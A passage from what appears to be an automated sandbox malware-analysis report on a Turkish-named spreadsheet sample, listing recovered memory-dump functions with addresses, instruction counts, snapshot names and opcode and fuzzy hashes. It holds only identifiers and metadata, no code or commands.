                                                  • Opcode Fuzzy Hash: b90963e23448efb8d18cf957bf72b16415a58573cdcc7e727547115d3a419ccb
                                                  • Instruction Fuzzy Hash: 70012830A02059EFD714CF59F5887E9BBB7FB88306F08A0B1D6064A168D3795DA5CF02
                                                  Function 05AE7040 Relevance: .0, Instructions: 36COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5d173cbc3b4f472ac61e3050c76c00870e0171e067161deab533b8cebd30b2fa
                                                  • Instruction ID: 1518033dc2d10a50b48cf92262a137806f7b8e1adedfe09aa24696512f3337d0
                                                  • Opcode Fuzzy Hash: 5d173cbc3b4f472ac61e3050c76c00870e0171e067161deab533b8cebd30b2fa
                                                  • Instruction Fuzzy Hash: 1DF027317083906FD3338776DC18F277FEAEB86320F01857AE149C7581C676684187A0
                                                  Function 05AE6180 Relevance: .0, Instructions: 35COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5d95e907b0be1a1cf24371d551323979af92aa611e83b84c5f539c269fcc6e4d
                                                  • Instruction ID: d0ea1029f1527e6f06d285d5a24325a557df9335b9fd44a13ec7c6155d48450a
                                                  • Opcode Fuzzy Hash: 5d95e907b0be1a1cf24371d551323979af92aa611e83b84c5f539c269fcc6e4d
                                                  • Instruction Fuzzy Hash: 21F0FE6234E3D45FDB034620AD21E997F744B66A00F4A48DBD090CF0A3D616A80A87A2
                                                  Function 05AD73A2 Relevance: .0, Instructions: 35COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 043f2994b765fa8e80c9fec4ce1345111556bcd1acca78fde9bca096c690b022
                                                  • Instruction ID: 34f1832c01715bbe3e4a7c60742b2086b08090e1452197a7dbfb03e946eda2bb
                                                  • Opcode Fuzzy Hash: 043f2994b765fa8e80c9fec4ce1345111556bcd1acca78fde9bca096c690b022
                                                  • Instruction Fuzzy Hash: 35012174905108DFDB08DF59E485BD9BBB2FB56314F0042AAE10A67295DB344DC58F61
                                                  Function 05AD92A8 Relevance: .0, Instructions: 35COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 13eb4589ffc0d9ed2f3b833eb13f7e83467a58b237795f6ea492a186481b3f8f
                                                  • Instruction ID: 06f6f6e8c8d0baa0c164c33bf19bcd8ae1a364e0c680405d3cff831f356420b6
                                                  • Opcode Fuzzy Hash: 13eb4589ffc0d9ed2f3b833eb13f7e83467a58b237795f6ea492a186481b3f8f
                                                  • Instruction Fuzzy Hash: 3AF0C274D082499FCB55EFA8C440AADFFF5AB06314F1481DAD81997392E3759A02CBA0
                                                  Function 057E854B Relevance: .0, Instructions: 34COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0c2bda2eb1e38681ff7ca52f05db8d902f4ca938b3d8aec9c12f56826f3b1399
                                                  • Instruction ID: a5222aa9b45240576931d1f5a4f490157db99fbaa59db12db2f2f3e8a76d8f00
                                                  • Opcode Fuzzy Hash: 0c2bda2eb1e38681ff7ca52f05db8d902f4ca938b3d8aec9c12f56826f3b1399
                                                  • Instruction Fuzzy Hash: 0FF06270D04248AFCB51CFA9D840BADBFF4AB09311F14C1A9E8A493281C7369752EB91
                                                  Function 05AD64A0 Relevance: .0, Instructions: 34COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6acadadebd6ac0232e9c042f6158b0ea8ce8d52702e49e41254b9872f8bb1ea2
                                                  • Instruction ID: 1ae119e7863f69a024312675cc18142e078e83c6fc47d1156a3b280b3788aec2
                                                  • Opcode Fuzzy Hash: 6acadadebd6ac0232e9c042f6158b0ea8ce8d52702e49e41254b9872f8bb1ea2
                                                  • Instruction Fuzzy Hash: FFF06DB0C19248AFCF51EFA8C5409ADBFB1AB05314F1082EADA55973A2D3355A42DB51
                                                  Function 05AD87F8 Relevance: .0, Instructions: 34COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b907a0bbf37aec8e8113937c21b1200561488870106ce90440bf8416f4c19407
                                                  • Instruction ID: d56b05e098e1d0829c1a05b3c3095de8f5bd957feaa79fb0f910ae1c4f2a90e3
                                                  • Opcode Fuzzy Hash: b907a0bbf37aec8e8113937c21b1200561488870106ce90440bf8416f4c19407
                                                  • Instruction Fuzzy Hash: 0DF06270D08245AFCB52EBA8D4009ACFFF1EF06254F1082DAD855D7252D2356A02DB91
                                                  Function 05AEAD3B Relevance: .0, Instructions: 33COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0fb9c99188acce5849bf64b61df7e0ebf77e6ef6608bf63c3b9a3201fbf03e82
                                                  • Instruction ID: 7d70f3d9afddb8e609c3b54b9216c1a59cb85c1406e01ee13288b78feb9dac47
                                                  • Opcode Fuzzy Hash: 0fb9c99188acce5849bf64b61df7e0ebf77e6ef6608bf63c3b9a3201fbf03e82
                                                  • Instruction Fuzzy Hash: 0CF02436610248DFC712EFB4C488FAA37F4EF02301F4100A6C4029F111FBB69504D7A1
                                                  Function 05AEE840 Relevance: .0, Instructions: 33COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b086bb76be64de3dfba0137f238f250322c9c0d3e1500fb72f71294d19352542
                                                  • Instruction ID: 27ccd661fc3365748ec800e2bc77509404ce70bd90ce5a0a0924470c10492822
                                                  • Opcode Fuzzy Hash: b086bb76be64de3dfba0137f238f250322c9c0d3e1500fb72f71294d19352542
                                                  • Instruction Fuzzy Hash: CEF08274D08108AFCB40DFE5D541BEDBBF5EB19301F1081AAD81997351C6359A42DB81
                                                  Function 057E8D40 Relevance: .0, Instructions: 33COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 94e68c75fd78c2db6e1648dd32ccbfcf735942497c15d37a3336809cb6166ccc
                                                  • Instruction ID: 4caf7364b5725facd4fff5e869876c6aa495832d4ff902b8d4a80aa945e7c887
                                                  • Opcode Fuzzy Hash: 94e68c75fd78c2db6e1648dd32ccbfcf735942497c15d37a3336809cb6166ccc
                                                  • Instruction Fuzzy Hash: C2F06D75908348AFC755DFA8C80069CBBF4FB2D300F0480EA9859D7351D2319A01EF52
                                                  Function 05AE20D8 Relevance: .0, Instructions: 32COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 011c490724b7e563de4a0afe1de3b43d2a6685061afee9c17a30687522e39772
                                                  • Instruction ID: f36b7eb6a4f46c79eeb85b1fd9f26181d83d8e5919ebacd6c3135d030d749af5
                                                  • Opcode Fuzzy Hash: 011c490724b7e563de4a0afe1de3b43d2a6685061afee9c17a30687522e39772
                                                  • Instruction Fuzzy Hash: 04F0FE353506049FC714DB19D458D2AB7AAEFC9721B158069F94ACB760CA71EC42DBA0
                                                  Function 05E03C50 Relevance: .0, Instructions: 32COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a459d9738daa83ccba482252838e84851573572b8a8fff2883dc62425bed1c6e
                                                  • Instruction ID: 2186db11a5bc9b0cde5500512aaebf9e0257b4af57fc1ecdc3d1ecd9ad09127a
                                                  • Opcode Fuzzy Hash: a459d9738daa83ccba482252838e84851573572b8a8fff2883dc62425bed1c6e
                                                  • Instruction Fuzzy Hash: CDF0F931C0020AEBCF01DF99D8409EEBB75FF89324F10D519E99877251D732A5A6DBA0
                                                  Function 03114DB0 Relevance: .0, Instructions: 32COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a80833bda774596acbea73a4b0b8b26fe08886107c9dca6dce588bf3dad00bd4
                                                  • Instruction ID: e530006f5d5c93300aa9d0bc4048c13e08287d0adb2a321a1ca5f3d8fc97ff3f
                                                  • Opcode Fuzzy Hash: a80833bda774596acbea73a4b0b8b26fe08886107c9dca6dce588bf3dad00bd4
                                                  • Instruction Fuzzy Hash: 86F0BE316452049FDF28CF06EC907E57B77EBAEB15F0E80F6E1464A0A5DB7419A28B10
                                                  Function 031115E9 Relevance: .0, Instructions: 32COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e4cd5ff248985139449123b5723b00b84c3b033bac82e45a8e50b67ac3ceff89
                                                  • Instruction ID: e17d15604586b27d84f42b6ffff1638657f1d9a910bd517ee185267d420a7061
                                                  • Opcode Fuzzy Hash: e4cd5ff248985139449123b5723b00b84c3b033bac82e45a8e50b67ac3ceff89
                                                  • Instruction Fuzzy Hash: 34F06971E011188BEB0CDF16E895694B7F8BF4C30174A80B6C64AAB12AC734EC86CF80
                                                  Function 05E22BAC Relevance: .0, Instructions: 32COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063678264.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e20000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ff872006f3bb3880626e1f69eef805186aa432c253812ab35c43da38e5d3d0f0
                                                  • Instruction ID: 27518143afcc17312717e5e415f0487e586a9e7ab85c380ad941b5059807a3fb
                                                  • Opcode Fuzzy Hash: ff872006f3bb3880626e1f69eef805186aa432c253812ab35c43da38e5d3d0f0
                                                  • Instruction Fuzzy Hash: AA0181B4A002188FDB24DF58C848AE9B7B6FF4A700F1050D6D44D97355DF346E828F60
                                                  Function 05AE4631 Relevance: .0, Instructions: 31COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 765ffbc3c814f8ddca2bce6528ee7626194159c990ceea2046e2a921efa29c4d
                                                  • Instruction ID: 3820d1be3fffcc20eb56aa6879dbfd411c116d669b9410341afb0bb4f65a9aed
                                                  • Opcode Fuzzy Hash: 765ffbc3c814f8ddca2bce6528ee7626194159c990ceea2046e2a921efa29c4d
                                                  • Instruction Fuzzy Hash: 1EF0E531B082642FCB05976D6814BFDBBE99FC6710F0580BBD508DB281DAB60901CB85
                                                  Function 05E053A0 Relevance: .0, Instructions: 31COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3aaa494aedf6245542c38e3b40dba9dfedc6fbe3291d338c45c4e0872963e6b0
                                                  • Instruction ID: 87a1b63cc6e2e5c40e85958c5cd9b3efcb8be8c9c08dcc5d3d5e98e6f7382812
                                                  • Opcode Fuzzy Hash: 3aaa494aedf6245542c38e3b40dba9dfedc6fbe3291d338c45c4e0872963e6b0
                                                  • Instruction Fuzzy Hash: 55F05839414208EFCB01CFA4D941BDDBFB2FB49314F14A5A9ED5892351C7329AA2EF40
                                                  Function 05E2360B Relevance: .0, Instructions: 31COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063678264.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e20000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fbd1bad9a1395e9708fb9d7ae8fa2493d2a98fd0d6dabc3f91f06fe4d8d9d197
                                                  • Instruction ID: 02df7f4a95da2cc10f3069b81fafbcf0faa846af392dc9d408e8b43cd4000c9c
                                                  • Opcode Fuzzy Hash: fbd1bad9a1395e9708fb9d7ae8fa2493d2a98fd0d6dabc3f91f06fe4d8d9d197
                                                  • Instruction Fuzzy Hash: F901E978A012188FDB65DF28D8849D9BBF1FF49704F5481EAE819A7354DB30AE80CF41
                                                  Function 03117468 Relevance: .0, Instructions: 30COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 30fe15e65aa9e715706e0c19d28cd8fb08c85017ef207cc927d7f0fc5f8a0e59
                                                  • Instruction ID: f697198a11c9d31aca06d278379f5a9b1621230dd9014fc0f5a42ac24c1b411a
                                                  • Opcode Fuzzy Hash: 30fe15e65aa9e715706e0c19d28cd8fb08c85017ef207cc927d7f0fc5f8a0e59
                                                  • Instruction Fuzzy Hash: 11F05E70604A00CBE324CA19E8457E2BAE7E78C361F59C1B5D0EA47FE4D774A8D1DB45
                                                  Function 05AED420 Relevance: .0, Instructions: 29COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 31a8a1a3215911fc68f106c1152ef4a744df57ad8f5f0862a5352a0666c2902d
                                                  • Instruction ID: 4fbaaafda0d69b2ee6ff5a1a014609c64419d88c8dae1cd76548449195673806
                                                  • Opcode Fuzzy Hash: 31a8a1a3215911fc68f106c1152ef4a744df57ad8f5f0862a5352a0666c2902d
                                                  • Instruction Fuzzy Hash: A1F08C3091D3889FCB52EFBC9544AECBFF1AF1A211F1442EED9449E292D7326941D742
                                                  Function 05AEC1D8 Relevance: .0, Instructions: 29COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ee6acaf707b29f6120cb9e7e121eb02948cf3a11703ea251797a8cc0a9c516b1
                                                  • Instruction ID: 0120b8e21bbce8dc1115b05c38dcd9ee773e3e3871954661b29b7106695d359f
                                                  • Opcode Fuzzy Hash: ee6acaf707b29f6120cb9e7e121eb02948cf3a11703ea251797a8cc0a9c516b1
                                                  • Instruction Fuzzy Hash: 08F0ED74909108ABC705EFB4D5A25ACBFB0AB16225F2481EEC81887356DA325E03CB80
                                                  Function 057E6CDC Relevance: .0, Instructions: 29COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3fd63dc3f15ae035e145c068a65b286e2ba66d04e5bd7b528c98eb9340699523
                                                  • Instruction ID: 2f8af727fb6293a185787bb9e7fc3e3c6e78c624a6f5a64fb9fca199057ef478
                                                  • Opcode Fuzzy Hash: 3fd63dc3f15ae035e145c068a65b286e2ba66d04e5bd7b528c98eb9340699523
                                                  • Instruction Fuzzy Hash: F4017E74A15228CFDB66DF24D988BA8BBB6FB08311F5012E9D44DA7250CB346E84DF00
                                                  Function 057E2F60 Relevance: .0, Instructions: 29COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5d81076ebf3e4b85a0c1f7d4a6e70f8a94bd8e3559084e6363e4cbf137152b1a
                                                  • Instruction ID: 147ce545c65429333bdcf2db6bb7ad7de11ba3eff4616fc5b0be193bd4c149af
                                                  • Opcode Fuzzy Hash: 5d81076ebf3e4b85a0c1f7d4a6e70f8a94bd8e3559084e6363e4cbf137152b1a
                                                  • Instruction Fuzzy Hash: 80F01274D15244DFCB49CFA8D881A9CBBB4FF5A314F1085EAD8059B352C7316916DF41
                                                  Function 057EAF10 Relevance: .0, Instructions: 29COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 73a6be4a376d523c5db60d64dbf4ccf843de7e9782e2a8c001ed6716e03f7d1c
                                                  • Instruction ID: 04607d6391a999d44dd8f77913c8ed2c42338e6ddb719ba2308292e44500ede6
                                                  • Opcode Fuzzy Hash: 73a6be4a376d523c5db60d64dbf4ccf843de7e9782e2a8c001ed6716e03f7d1c
                                                  • Instruction Fuzzy Hash: FFF082B4E15208EFCB00DFA8D4496ACFBF1FB18601F0581E9D844A7351D634DA04EF40
                                                  Function 057E2795 Relevance: .0, Instructions: 29COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5d1ec96f22649158f05559c6052ddd8b84f8598844cdc5de3a6e84231ffd8fd5
                                                  • Instruction ID: f2e5c00ffe5fecfa48530ea6660577f5faa52639c8d7be673e1355ac9b66ff5b
                                                  • Opcode Fuzzy Hash: 5d1ec96f22649158f05559c6052ddd8b84f8598844cdc5de3a6e84231ffd8fd5
                                                  • Instruction Fuzzy Hash: 9EF0F978909229CFCB65CF68D880BA8BBB5FB1E300F0080A6E549A7352D7745D80DF11
                                                  Function 057EBE98 Relevance: .0, Instructions: 29COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c2f8ee4e8217266ec454d1db73ab16acfe9fa80c2c856a86f8724fc34369a82d
                                                  • Instruction ID: b39d8d625736fb3b097bf0602daa8c73fd1096ee551512a61117219b43d434ed
                                                  • Opcode Fuzzy Hash: c2f8ee4e8217266ec454d1db73ab16acfe9fa80c2c856a86f8724fc34369a82d
                                                  • Instruction Fuzzy Hash: 84F0827160A3048FD724CB25E481AA57BB3FB8E310F0582A6DB0D87267D7345C42DF41
                                                  Function 057E8130 Relevance: .0, Instructions: 29COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7d0a4af821b59a83f0cddd7255af9f7778226c74b78bcd80df563d2094f37f8c
                                                  • Instruction ID: 461e0f6b2964b3287e7b48211630c33dbb072f80906f7c1153a3baaf9bce2284
                                                  • Opcode Fuzzy Hash: 7d0a4af821b59a83f0cddd7255af9f7778226c74b78bcd80df563d2094f37f8c
                                                  • Instruction Fuzzy Hash: 71F08C70D19348AFCB11DFA8C80429CBBB2EB1A300F4084EAD804A3352D3355A41EF82
                                                  Function 05E01ED8 Relevance: .0, Instructions: 29COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dacabb3b071f71a368b3ffd923ce55d21fce94e7bf9b73b98b50ee10ed9c8f57
                                                  • Instruction ID: c6ca0fe5ead522b8f23daebc4f64c6f12688124b064d4e121cb4dbe0c8885fca
                                                  • Opcode Fuzzy Hash: dacabb3b071f71a368b3ffd923ce55d21fce94e7bf9b73b98b50ee10ed9c8f57
                                                  • Instruction Fuzzy Hash: 5FF08C36408108EBCB06CF94DC86A9CBB76EB18301F149099EC0426350C3329A62EB80
                                                  Function 05AE9FA9 Relevance: .0, Instructions: 28COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 67dca55ac65adca4a40f6de3de60f42180faf9600e33628295e1e1caab2f3b36
                                                  • Instruction ID: 6e310b5b8ad4a45cd39efff23e09a047e0949582b7c92e2e0084579f3e806e21
                                                  • Opcode Fuzzy Hash: 67dca55ac65adca4a40f6de3de60f42180faf9600e33628295e1e1caab2f3b36
                                                  • Instruction Fuzzy Hash: 26F03070D18248AFC701CB98D441AEDBFB4EB49211F1081DAD81863356D631AA51DF81
                                                  Function 057EEDA0 Relevance: .0, Instructions: 28COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
